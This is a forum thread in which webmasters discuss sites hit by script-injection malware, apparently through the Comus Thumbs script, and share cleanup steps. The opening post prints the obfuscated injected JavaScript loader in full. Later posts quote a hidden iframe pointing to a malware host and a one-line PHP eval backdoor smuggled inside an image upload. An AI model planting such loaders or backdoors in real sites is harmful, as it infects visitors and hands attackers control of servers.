Got hacked! Help!

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • HEAT
    Confirmed User
    • Sep 2003
    • 2255

    #1

    Got hacked! Help!

    Some of my sites that using TGPX, TEVS and Comus thumbs are getting malware injection attack. One of my dedicated servers got hit by malware distributer.
    Below code is injected right after the body tag of html, tmpl and some php files.

    <script>/**/function VtL2(RoHS, Nvy4, Ipv6) { var CnP8; CnP8=RoHS.split(Nvy4); var igs6=CnP8.join(Ipv6); return igs6;/**/ } function PKs7(cie8) { cie8 = VtL2(cie8,"##+##","'"); cie8 = VtL2(cie8,"##|##","\\"); igs6=""; gbq5 =""; for(k=0;k<cie8.length;k++) { igs6 = cie8.charCodeAt(k); if (igs6==32){igs6=35} else if (igs6==35){igs6=32} else if (igs6==59){igs6=64} else if (igs6==64){igs6=59} else if (igs6==37){igs6=42} else if (igs6==42){igs6=37} else if (igs6>=97 && igs6<=122) { igs6=igs6-97;igs6=25-igs6;igs6+=97; }else if (igs6>=65 && igs6<=90) { igs6=igs6-65;igs6=25-igs6;igs6+=65; }else if (igs6>=48 && igs6<=57) { igs6=igs6-48;igs6=9-igs6;igs6+=48; } gbq5 += String.fromCharCode(igs6); } return gbq5;/**/ }bqL1=eval;var RoSt;var Ldod;var CEg0;var Kil2;var cbk1;var Zku4;var Lfo0;bqL1(PKs7('Apf5#=###+##sggk://tzbhvc634.xln/hg/xhh/a/hgzgrx.ksk##+##@xyp8#=###+##ruiznv##+##@'));bqL1(P Ks7('IlHg#=#wlxfnvmg.xivzgvVovnvmg(xyp8)@IlHg.hvgZ ggiryfgv(##+##hix##+##,#Apf5)@'));bqL1(PKs7('IlHg. hvgZggiryfgv(##+##drwgs##+##,9)@IlHg.hvgZggiryfgv( ##+##svrtsg##+##,9)@IlHg.hvgZggiryfgv(##+##yliwvi# #+##,9)@'));bqL1(PKs7('IlHg.hvgZggiryfgv(##+##hgbo v##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+# #)@'));bqL1(PKs7('IlHg.hvgZggiryfgv(##+##hgbov##+# #,##+##wrhkozb:mlmv##+##)@#Oul9=mzertzgli.fhviZtvm g.glOldviXzhv()@'));bqL1(PKs7('XVt9=Oul9.rmwvcLu(# #+##nhrv##+##)@Owlw=Oul9.rmwvcLu(##+##nhrv#1##+##) @Pro7=Oul9.rmwvcLu(##+##mg#3##+##)@'));if ((Ldod==-1)&&(CEg0>0)&&(Kil2==-1)){bqL1(PKs7('wlxfnvmg.ylwb.zkkvmwXsrow(IlHg)@')) ;}</script>
    I wonder if any you guys had the same experience and any luck at detecting and removing it permanently? After throwing out my pc, uploading AVG and Spybot, changing all my passwords, dropping FTP in favor of SFTP I'm now taken up the process of manually removing the code above.
    But they are constantly adding this JS code even if I removed it...

    Since the box is unmanagged, Maybe I will have to reload server OS and restore whole files from backup. but I'm worry about the backup is infected as well..

    Beware guys, check your server security, file/dir permission etc. also your PC is not safe as well. Install a good anti-malware and don't save password at your local ftp client.

    http://www.webhostingtalk.com/showth...rame+injection
    254-282-542
  • asianseekerz
    Confirmed User
    • Aug 2008
    • 1609

    #2
    change your index page delete the page having that code, then change all your access
    LUSTY LIFES : Dad & Daughter Wild Adventures : Naughty Wild Sister
    Contact : ICQ : 372109
    Email add: [email protected]

    Comment

    • notime
      Confirmed User
      • Jun 2003
      • 8025

      #3
      Is it this one?
      forums.digitalpoint.com/showthread.php?t=901622

      Comment

      • k0nr4d
        Confirmed User
        • Aug 2006
        • 9231

        #4
        This is usually caused by a virus on your computer. Have your host check ftp logs, and i bet you will have a bunch of unknown logins. These viruses append this code to any file named index.php index.html etc.
        Mechanical Bunny Media
        Mechbunny Tube Script | Mechbunny Webcam Aggregator Script | Custom Web Development

        Comment

        • katharos
          So Fucking Banned
          • Nov 2005
          • 1515

          #5
          i am amazed how much webhosts have easy to hack ftp logins ...

          Comment

          • BestXXXPorn
            Confirmed User
            • Jun 2009
            • 2277

            #6
            If it's not caused by your own computer it may be also be caused from something on your site...

            If you have photo uploads... it's possible someone has uploaded a fake image that is actually running code...

            You may also have your permissions set wrong on the files on your server allowing someone to exploit your box and add things to the content...
            ICQ: 258-202-811 | Email: eric{at}bestxxxporn.com

            Comment

            • qxm
              Confirmed User
              • Jul 2006
              • 5970

              #7
              Originally posted by HEAT
              After throwing out my pc, uploading AVG and Spybot, changing all my passwords, dropping FTP in favor of SFTP I'm now taken up the process of manually removing the code above.
              U on a windows server? ..... At any rate.... u shouldn't be using AVG .. that shit is crap (yeah redundant I know), I got infected by 9 types of trojans, malware, fuckware and 666-satanic-ware and viruses while using it and the piece of crap didn't detect any problem at all.... so u better use something with better heuristics ... Avira or Avast

              Good luck getting that code outta ur sites 2 ...

              ICQ: 266990876

              Comment

              • directfiesta
                Too lazy to set a custom title
                • Oct 2002
                • 30135

                #8
                Originally posted by katharos
                i am amazed how much webhosts have easy to hack ftp logins ...
                maybe you should replace " webhosts " by " webmasters "
                I know that Asspimple is stoopid ... As he says, it is a FACT !

                But I can't figure out how he can breathe or type , at the same time ....

                Comment

                • Davy
                  Confirmed User
                  • Apr 2006
                  • 4323

                  #9
                  Do yourself a favor and find the security hole before you fix the site.
                  You need to find how they got in (assuming they hacked your server).
                  ---
                  ICQ 14-76-98 <-- I don't use this at all

                  Comment

                  • HomerSimpson
                    Too lazy to set a custom title
                    • Sep 2005
                    • 13826

                    #10
                    here's my guide:

                    step 1: update your adobe reader to latest version (9.xx) or even better remove it and put FoxIt Reader (much smaller and faster).

                    step 2: update flash player plugins for IE and FF

                    step 3: download 2-3 anti-spyware softwares and check your computer

                    step 4: once you are clean login and change all your paswords and fix the sites.

                    step 5: monitor what's going on...

                    - - - -

                    extra steps

                    * Download and use Total Commander 7.5 that has password encryption option that makes your passwords safe (this I haven't found on any other software and that's the weakest point of most of ftp clients)

                    * always have anti-virus, firewall and anti-spyware app active (I use Nod32 Smart Security AV+FW + AdAware)

                    * use only firefox and chrome instead of IE

                    all mentioned software you may find and download at http://www.filehorse.com
                    Make a bank with Chaturbate - the best selling webcam program
                    Ads that can't be block with AdBlockers !!! /// Best paying popup program (Bitcoin payouts) !!!

                    PHP, MySql, Smarty, CodeIgniter, Laravel, WordPress, NATS... fixing stuff, server migrations & optimizations... My ICQ: 27429884 | Email:

                    Comment

                    • Spudman
                      Confirmed User
                      • Aug 2002
                      • 3198

                      #11
                      Dude its a comus thumbs issue as far as i'm aware. I'm currently deleting all my comus installs (over 40) and replacing the script with a new one as i have been hit with this hack 3 days ago and still fixing it.
                      I have used comus for over 5 years and these hacks are all to regular these days, they never update comus and its going to the shit so i would delete it and rebuild site with new script.

                      my 2cents
                      Take it Easy !!!

                      Comment

                      • katharos
                        So Fucking Banned
                        • Nov 2005
                        • 1515

                        #12
                        Originally posted by directfiesta
                        maybe you should replace " webhosts " by " webmasters "
                        webmasters also, but i mean there are no limits in bruteforcing ftp, you can have one proxy and bruteforce to the infinity

                        Comment

                        • TGThomas
                          Registered User
                          • Jan 2008
                          • 75

                          #13
                          Where you using Filezilla to upload? i know a while back their was a problem with that program letting a virus in to change your .php files
                          You can contact me via the following:

                          AIM - playazdb0y
                          ICQ - 459454282
                          Email - [email protected]

                          Comment

                          • split_joel
                            Confirmed User
                            • Jan 2005
                            • 2270

                            #14
                            Okay a few things here,

                            what scripts are you running on your server. Are you running joomla? What are the directory permissions of your php files? Hit me up on aim or icq if your host isnt going to fix it for you, as I hate people that hack sites more then anything on the face of the damn planet.
                            E-mail marketing - Automation Scripting - IP Space
                            AIM: splitjoelp ICQ: 254759453 skype - splitjoelp 702-941-6465

                            Comment

                            • HEAT
                              Confirmed User
                              • Sep 2003
                              • 2255

                              #15
                              Originally posted by notime
                              Is it this one?
                              forums.digitalpoint.com/showthread.php?t=901622
                              Not sure but looks like it.
                              254-282-542

                              Comment

                              • HEAT
                                Confirmed User
                                • Sep 2003
                                • 2255

                                #16
                                Problem solved.

                                When the script is executed(I visited a infected site accidently yesterday. I guess) it loaded malware which disguised as .pdf or .swf file that steals username/password data from PC.
                                The malware is hosted at another infected site and loaded via iframe then excuted on the browser.
                                Now the hacker got my site's login and infected my sites too.
                                I don't know how he connected my box though. I guess he's using remote script that doesn't leave log info.

                                Even if I remove those malwares in my PC and change ftp password, the hacker can get my new password easily since I had to load my sites to check.
                                So it is very important that never load the sites during troubleshooting.

                                This is what I did and seems like the code is gone finally. but still monitering..
                                1. reboot PC and scan it for spyware.
                                2. reboot again and change all server passwords.
                                3. remove the code from all server files(index.html, category.html, index.php, etc..) with serverside text editor.
                                4. Never load infected webpages on browser during #3.
                                5. install mod_security and change file permissons.

                                This thing reminds me of BackOrifice at 98'. It's the most annoying fuckware I had ever. it passed mcafee.
                                Remember to use a good antivirus on your PC. I had good result with Malwarebytes.org

                                Thanks for advices.
                                Last edited by HEAT; 09-17-2009, 10:21 AM.
                                254-282-542

                                Comment

                                • borked
                                  Totally Borked
                                  • Feb 2005
                                  • 6284

                                  #17
                                  and another reason to not use ftp, but sftp....

                                  A security researcher has discovered a cluster of infected Linux servers that have been corralled into a special ops botnet of sorts and used to distribute malware to unwitting people browsing the web.

                                  Each of the infected machines examined so far is a dedicated or virtual dedicated server running a legitimate website, Denis Sinegubko, an independent researcher based in Magnitogorsk, Russia, told The Register. But in addition to running an Apache webserver to dish up benign content, they've also been hacked to run a second webserver known as nginx, which serves malware.
                                  ...
                                  The infected machines observed by Sinegubko serve legitimate traffic on port 80, the standard TCP port used by websites. Behind the scenes, the rogue server sends malicious traffic over port 8080. The malicious payloads are then delivered with the help of dynamic DNS hosting providers, which offer free domain names that are mapped to the IP address of the zombie webserver.

                                  The links look something like this:
                                  Code:
                                  <i_frame src="http ://a86x . homeunix . org:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>
                                  They are injected into legitimate websites, so that they are surreptitiously served when users browse the infected page.

                                  It's unclear exactly how the servers have become infected. Sinegubko speculates they belong to careless administrators who allowed their root passwords to be sniffed. Indeed, the part of the multi-staged attack that plants malicious iframes into legitimate webpages uses FTP passwords that have been stolen using password sniffers. It's likely the zombie servers were compromised in the same fashion, he explained.

                                  For coding work - hit me up on andy // borkedcoder // com
                                  (consider figuring out the email as test #1)



                                  All models are wrong, but some are useful. George E.P. Box. p202

                                  Comment

                                  • HEAT
                                    Confirmed User
                                    • Sep 2003
                                    • 2255

                                    #18
                                    Originally posted by Spudman
                                    Dude its a comus thumbs issue as far as i'm aware. I'm currently deleting all my comus installs (over 40) and replacing the script with a new one as i have been hit with this hack 3 days ago and still fixing it.
                                    I have used comus for over 5 years and these hacks are all to regular these days, they never update comus and its going to the shit so i would delete it and rebuild site with new script.

                                    my 2cents

                                    Yep. looks like Comus is gonna dead soon. lots of security holes and no updates.
                                    also going to drop it asap.
                                    254-282-542

                                    Comment

                                    • HEAT
                                      Confirmed User
                                      • Sep 2003
                                      • 2255

                                      #19
                                      Originally posted by split_joel
                                      Okay a few things here,

                                      what scripts are you running on your server. Are you running joomla? What are the directory permissions of your php files? Hit me up on aim or icq if your host isnt going to fix it for you, as I hate people that hack sites more then anything on the face of the damn planet.
                                      No joomla and running various TGP/tube scripts. Permissions were set to 755 for directories and php files had varous permissions as I followed script manuals.
                                      most are 644, data/tempates dir and files were set to 777.
                                      I changed lots of files to 444 for monitering.
                                      will contact you if I get codes again. Thanks!
                                      254-282-542

                                      Comment

                                      • Spudstr
                                        Confirmed User
                                        • Jan 2003
                                        • 2321

                                        #20
                                        this exploit is going around and it seems to be comus is the problem from watching the audit logs and investigating. Even if a server has comus installed unless setup with 1 domain per login etc due to permissions i.e having 777 on things you should not it will infect a whole mess of files and leave backdoors everywhere.
                                        Managed Hosting - Colocation - Network Services
                                        Yellow Fiber Networks
                                        icq: 19876563

                                        Comment

                                        • Klen
                                          • Aug 2006
                                          • 32235

                                          #21
                                          Welcome to the club,my one old unsecured machine is also hacked with completely same crap.I working now on removing it.And yes i do have several comus installations there.But i dont see how can comus bug affect all possible sites,no matter are they based on st,tgpx or something else(and i have all three rotator scripts installed)

                                          Comment

                                          • smoothballs
                                            Confirmed User
                                            • Aug 2004
                                            • 151

                                            #22
                                            Yep my Comus sites are hacked too for the last couple of days....fucking me off thinking how many will not return cos of warnings thrown up by their anti virus....already had a email from google saying they have tagged my highest traffic site with a "this site could harm your computer" in their search pages...just waiting for more emails from them for my other comus sites!

                                            Comment

                                            • Klen
                                              • Aug 2006
                                              • 32235

                                              #23
                                              Originally posted by smoothballs
                                              Yep my Comus sites are hacked too for the last couple of days....fucking me off thinking how many will not return cos of warnings thrown up by their anti virus....already had a email from google saying they have tagged my highest traffic site with a "this site could harm your computer" in their search pages...just waiting for more emails from them for my other comus sites!
                                              Ugh and problem is code appear again once it's remove,first i tried chmod 644,then chown to apache,and still it shows again.Well if it comus problem then only solution would be to completly delete all comus installations.

                                              Comment

                                              • Spudstr
                                                Confirmed User
                                                • Jan 2003
                                                • 2321

                                                #24
                                                Originally posted by KlenTelaris
                                                Welcome to the club,my one old unsecured machine is also hacked with completely same crap.I working now on removing it.And yes i do have several comus installations there.But i dont see how can comus bug affect all possible sites,no matter are they based on st,tgpx or something else(and i have all three rotator scripts installed)
                                                Anyfile that is set to 777 or owned by apache/httpd can be edited by the exploit.
                                                Managed Hosting - Colocation - Network Services
                                                Yellow Fiber Networks
                                                icq: 19876563

                                                Comment

                                                • Klen
                                                  • Aug 2006
                                                  • 32235

                                                  #25
                                                  Originally posted by Spudstr
                                                  Anyfile that is set to 777 or owned by apache/httpd can be edited by the exploit.
                                                  Well i set index.php to 644 and it's not helping.

                                                  Comment

                                                  • smoothballs
                                                    Confirmed User
                                                    • Aug 2004
                                                    • 151

                                                    #26
                                                    Originally posted by KlenTelaris
                                                    Ugh and problem is code appear again once it's remove,first i tried chmod 644,then chown to apache,and still it shows again.Well if it comus problem then only solution would be to completly delete all comus installations.
                                                    thing is, I dont see any malicious code in view source...just the anti virus pop up warning...after a refresh dont get any warnings at all...

                                                    Comment

                                                    • area51 - BANNED FOR LIFE
                                                      So Fucking Banned
                                                      • Aug 2009
                                                      • 3163

                                                      #27
                                                      look at all the morons in here

                                                      Comment

                                                      • smoothballs
                                                        Confirmed User
                                                        • Aug 2004
                                                        • 151

                                                        #28
                                                        heres a quote from my hosts when I told them not to bother scanning my sites as it looks like a comus issue...

                                                        "Yes, Comus Thumbs has been causing a lot of issues lately "

                                                        Comment

                                                        • Klen
                                                          • Aug 2006
                                                          • 32235

                                                          #29
                                                          Ok so we concluded comus is cause of this?So i can start removing it.

                                                          Comment

                                                          • smoothballs
                                                            Confirmed User
                                                            • Aug 2004
                                                            • 151

                                                            #30
                                                            Originally posted by area51
                                                            look at all the morons in here
                                                            looks like there is only one moron in here who cant contribute anything...was that the most intelligent thing to come out of your mouth since Einstein's dick????

                                                            Comment

                                                            • notime
                                                              Confirmed User
                                                              • Jun 2003
                                                              • 8025

                                                              #31
                                                              Originally posted by HEAT
                                                              Not sure but looks like it.
                                                              I had it on my server so I know.
                                                              It happened when I was on the plane to the Montreal show.
                                                              That sucked but it was resolved in like 20 mins. after I found it and it was fixed by the programmers and system engineers.

                                                              Comment

                                                              • BestXXXPorn
                                                                Confirmed User
                                                                • Jun 2009
                                                                • 2277

                                                                #32
                                                                "But in addition to running an Apache webserver to dish up benign content, they've also been hacked to run a second webserver known as nginx, which serves malware."

                                                                Hahhahaha not only does it serve up malware, it serves up malware faster and more efficiently, hhahahah man that really cracks me up in a very geeky way, hahhhaha
                                                                ICQ: 258-202-811 | Email: eric{at}bestxxxporn.com

                                                                Comment

                                                                • notime
                                                                  Confirmed User
                                                                  • Jun 2003
                                                                  • 8025

                                                                  #33
                                                                  Originally posted by KlenTelaris
                                                                  Ok so we concluded comus is cause of this?So i can start removing it.
                                                                  I don't have comus or use it.

                                                                  The infection did not even take place on any of my office PC's, but in the office a few blocks down the street where the designers and programmers have the office.
                                                                  One guy there had an infected PC that had FTP access to one of my servers. Not sure if they use comus or not but I don't think so. Infection takes place thru adult infected websites in all popular browsers without anti-virus programs seeing it.

                                                                  Hidden custom build (FTP) logs show somebody using my FTP user/pass without brute force entering and adding some files and making some changes similar to all infected victims.

                                                                  Comment

                                                                  • BestXXXPorn
                                                                    Confirmed User
                                                                    • Jun 2009
                                                                    • 2277

                                                                    #34
                                                                    Originally posted by KlenTelaris
                                                                    Well i set index.php to 644 and it's not helping.
                                                                    Setting to 644 alone won't help you... What is the owner and group of the file? If it's set to the same as the webserver runs as then any exploit which is passing through your webserver will have full access to the file...

                                                                    If someone has already hacked your box you have way more issues to worry about... First things first:

                                                                    http://www.rootkit.nl/projects/rootkit_hunter.html

                                                                    Download it, install it, run it, then you can rule out most root kits and learn if your box has been compromised or not...

                                                                    If it has, you know the problem... if it hasn't then you can move onto the next step.

                                                                    GL!
                                                                    ICQ: 258-202-811 | Email: eric{at}bestxxxporn.com

                                                                    Comment

                                                                    • V_RocKs
                                                                      Damn Right I Kiss Ass!
                                                                      • Nov 2003
                                                                      • 32449

                                                                      #35
                                                                      Actually, old Comus is hackable... These are usually NOT FTP access problems and are problems with PHP scripts being hackable.

                                                                      Comment

                                                                      • Klen
                                                                        • Aug 2006
                                                                        • 32235

                                                                        #36
                                                                        Originally posted by BestXXXPorn
                                                                        Setting to 644 alone won't help you... What is the owner and group of the file? If it's set to the same as the webserver runs as then any exploit which is passing through your webserver will have full access to the file...

                                                                        If someone has already hacked your box you have way more issues to worry about... First things first:

                                                                        http://www.rootkit.nl/projects/rootkit_hunter.html

                                                                        Download it, install it, run it, then you can rule out most root kits and learn if your box has been compromised or not...

                                                                        If it has, you know the problem... if it hasn't then you can move onto the next step.

                                                                        GL!
                                                                        That was first thing which i did,but it didn't find any rootkit installed.Also i just noticed javascript on comus sites and on other it's not same.

                                                                        Comment

                                                                        • Klen
                                                                          • Aug 2006
                                                                          • 32235

                                                                          #37
                                                                          Here are copy pastes of java script codes:
                                                                          http://pastebin.com/m53fc9126
                                                                          http://pastebin.com/m1b861dd8

                                                                          Comment

                                                                          • Spudman
                                                                            Confirmed User
                                                                            • Aug 2002
                                                                            • 3198

                                                                            #38
                                                                            All My sites were hacked through comus, If you use comus, I advise deleting it and using another script, this appears to be only fix for me :2cents
                                                                            Take it Easy !!!

                                                                            Comment

                                                                            • HEAT
                                                                              Confirmed User
                                                                              • Sep 2003
                                                                              • 2255

                                                                              #39
                                                                              Found this from Webhostingtalk.com

                                                                              It is a series of viruses implanted on various PCs (and some Macs we've seen) that does little more than steal FTP credentials.

                                                                              It works in a variety of ways.

                                                                              First, it knows the files and their default locations of various FTP software, FileZilla, WS_FTP and many, many others. When users tell their software to save their logon credentials, it saves this information in a file on the computer. Then when you want to send an update to your website, the login information is already there.

                                                                              The virus looks for these files, opens them, reads the information and then sends it to a server where it's used to login to the website with valid credentials. There's no need to "crack" the password. Which is why strong passwords aren't a defense in this case.

                                                                              Second, the virus installs a keyboard logger. This variant is relatively new because earlier this year the hackers saw that everyone was telling people not to save their FTP username and passwords, so the hackers started installing keyboard loggers for those who type their passwords in each time. Same follow-through, the stolen information is sent to a server that infects the web site.

                                                                              Third, the virus "sniffs" the FTP traffic leaving the PC. Since FTP transmits all data, including username and password, in plain text, it's easy for the virus to see the username and password, capture it, send it to a server and ... (you get the idea).

                                                                              Fourth, and is the most recent, the virus will inject the malscript (the infectious iframe) into the FTP data stream as it leaves the user's PC. This latest variant is sneaky in that the website logs will show that FTP traffic originated from a valid source, with valid FTP credentials.

                                                                              The best way I've found to combat this is by following these steps:

                                                                              Step 1: Install a new anti-virus program. Obviously this virus knows how to evade detection of the current anti-virus. It doesn't matter what's being used currently, you have to install something different.

                                                                              Step 2: Login to your control panel at your web hosting provider's site and change your FTP password. Write it down at this point DO NOT ACCESS YOUR SITE with FTP until you finish all of these steps.

                                                                              Step 3: Scan and clean every PC that has FTP access to your site. This is also a must. Otherwise you have no idea who's PC it is. Do not give the new FTP passwords to anyone until after you have finished all of these steps.

                                                                              Step 4: Remove the malicious code from your webpages. If you have a known good back-up, use that. If not, download your site (yes you'll have to type in the new password, but hopefully you're already scanned and cleaned your PC). Then open each file in your HTML editor and find the infectious code. This particular malscript usually hides immediately after the opening body tag, but we've also seen it at the end of files. You'll have to check every file on your website not just index files or just html files. Check every file on your website even .js and .css files.

                                                                              Step 5: Change your FTP passwords again.

                                                                              Step 6: If you've been blacklisted by Google, login to your Google Webmaster Tools and verify your site if you haven't already, then request a review. You'll have to click on your site, then across the top you'll see in your dashboard a label in dark background that says, "This site may be distributing malware. More Details (which is a link). Click on that and request a review. If your site is clean, Google should bless you with removing that warning from SERPs.

                                                                              Then you should have that issue again.

                                                                              This is not the result of a faulty script or weak FTP passwords. It's the result of a virus on PC with FTP access to the infected website.
                                                                              It a solution for malware injection attack.
                                                                              Then again, It' not recommended to install unreliable php scripts anyway..
                                                                              254-282-542

                                                                              Comment

                                                                              • Klen
                                                                                • Aug 2006
                                                                                • 32235

                                                                                #40
                                                                                Well first thing which i did is to disable completely ftp but that didnt helped anything.Anyway my computer was not compromised since i am not using ftp at all,only sftp.

                                                                                Comment

                                                                                • BestXXXPorn
                                                                                  Confirmed User
                                                                                  • Jun 2009
                                                                                  • 2277

                                                                                  #41
                                                                                  My favorite exploit is the fake image upload that has a correct image header...

                                                                                  If the image gets stored "as is" the first line of it is <?eval($_REQUEST['someVar']?>

                                                                                  If the host is configured to parse image files (tracking, dynamic images, etc...) anything they pass in to the request gets evaled... so elegant, so simple, so devastating...
                                                                                  ICQ: 258-202-811 | Email: eric{at}bestxxxporn.com

                                                                                  Comment

                                                                                  • escorpio
                                                                                    King of Canada
                                                                                    • Oct 2002
                                                                                    • 23487

                                                                                    #42
                                                                                    Anyone heard from Comus regarding this problem? Is a fix being worked on or should I change scripts?
                                                                                    Unvaxxed, still alive.

                                                                                    Comment

                                                                                    • sandman!
                                                                                      Icq: 14420613
                                                                                      • Mar 2001
                                                                                      • 15431

                                                                                      #43
                                                                                      i think you might need a managed host.
                                                                                      Need WebHosting ? Email me for some great deals [email protected]

                                                                                      Comment

                                                                                      • boneless
                                                                                        Confirmed User
                                                                                        • Dec 2002
                                                                                        • 3625

                                                                                        #44
                                                                                        Originally posted by escorpio
                                                                                        Anyone heard from Comus regarding this problem? Is a fix being worked on or should I change scripts?
                                                                                        i consider myself at this point the ex tech support of comus. i worked for five years and the last year and the first year i had to cover for tony a lot.

                                                                                        ATM this is where we stand, im not saying comus is the prob but it is most likely the cause of all probs.

                                                                                        Comus license key admin login page file is broken atm, one of the things that happened to my girlfriend wordpress site during the hacks.

                                                                                        tbh with you guys, i myself am ditching comus as my script and am going for an alternative. For now its smart thumbs, and as i got over 100 comus sites i got a long and hard task ahead to switch em all over.

                                                                                        Im really hoping that all is well with tony but since i havent heard or seen him online in the past three weeks makes me wonder what the fuck is going on.

                                                                                        I hope im not getting loaded with 1000s of messages on my icq...

                                                                                        thnx yall,

                                                                                        Ed
                                                                                        icq:148573096 skype:dabone2 email:boneless(a)mgpteam(.)com

                                                                                        Comment

                                                                                        • Major (Tom)
                                                                                          So Fucking Banned
                                                                                          • Nov 2003
                                                                                          • 32492

                                                                                          #45
                                                                                          Originally posted by asianseekerz
                                                                                          change your index page delete the page having that code, then change all your access
                                                                                          Just a conjecture here, but that wont work. I've seen enough stuff attempted on my boxes and its always a hole in the script. remove the scripts and your ok. It's not really an access thing. Changing the locks on your front door is pointless if you leave the windows open.
                                                                                          Duke

                                                                                          Comment

                                                                                          • beta-tester
                                                                                            Rock 'n Roll Baby!
                                                                                            • Sep 2004
                                                                                            • 22562

                                                                                            #46
                                                                                            I am not sure how can you be so sure that actually comus is the root of your problems? I am using comus too, but with tightened security on the server itself and with my OS security I never get hacked, neither get into troubles with any of my sites.

                                                                                            This time I haven't been affected by this comus hack (which I think is not comus hack, just a malware insertion) and my sites are running smoothly.
                                                                                            The only thing I don't like about comus is that its admin interface loads iframe from their website, so if their website has the malware, then technically every site that runs comus has it too.

                                                                                            To get rid of malwares and to actually avoid getting them, just install normal os, like Linux, or buy Mac.

                                                                                            Oh, and just one remark: before doing anything on your own, have host run clamAV on your box/v. acc. and scan for potential infected files, as well as run the rootkit detection tools. Then it's your turn to make your own box clean and more secure.

                                                                                            Good luck!

                                                                                            Sig for sale. Affordable prices. Contact me and get a great deal ;)

                                                                                            My contact:
                                                                                            ICQ: 944-320-46
                                                                                            e-mail: manca {AT} HotFreeSex4All.com

                                                                                            Comment

                                                                                            • Naughty-Pages
                                                                                              Confirmed User
                                                                                              • Oct 2006
                                                                                              • 4533

                                                                                              #47
                                                                                              Originally posted by Spudman
                                                                                              Dude its a comus thumbs issue as far as i'm aware.
                                                                                              Agreed.... it's comus, but even after you kill Comus, you've got to check every site on the server comus was on even if the site is not using Comus... (I've got 14 sites so far that were affected )

                                                                                              Comment

                                                                                              • tranza
                                                                                                ICQ: 197-556-237
                                                                                                • Jun 2003
                                                                                                • 57559

                                                                                                #48
                                                                                                Look at your .htaccess and check if it's everything working nicely.
                                                                                                I'm just a newbie.

                                                                                                Comment

                                                                                                • Altwebdesign

                                                                                                  #49
                                                                                                  ive had this before!!
                                                                                                  Webair reverted my sites abck before the infection and changed all ftp info

                                                                                                  Comment

                                                                                                  • HEAT
                                                                                                    Confirmed User
                                                                                                    • Sep 2003
                                                                                                    • 2255

                                                                                                    #50
                                                                                                    Old thread. Yes I was wrong. it's a Comus thumbs hack. No ftp password issue.
                                                                                                    I misunderstood it was another iframe injection attack that caused from viruses on local machine. I installed mod_security then it stopped code injection but I thought it fixed by removing viruses on my PC.

                                                                                                    Anyway it's completely fixed by removing all backdoor scripts and infected files.
                                                                                                    If anyone still faces this froblem, refer this thread.
                                                                                                    http://www.gfy.com/showthread.php?t=928915
                                                                                                    254-282-542

                                                                                                    Comment

                                                                                                    Working...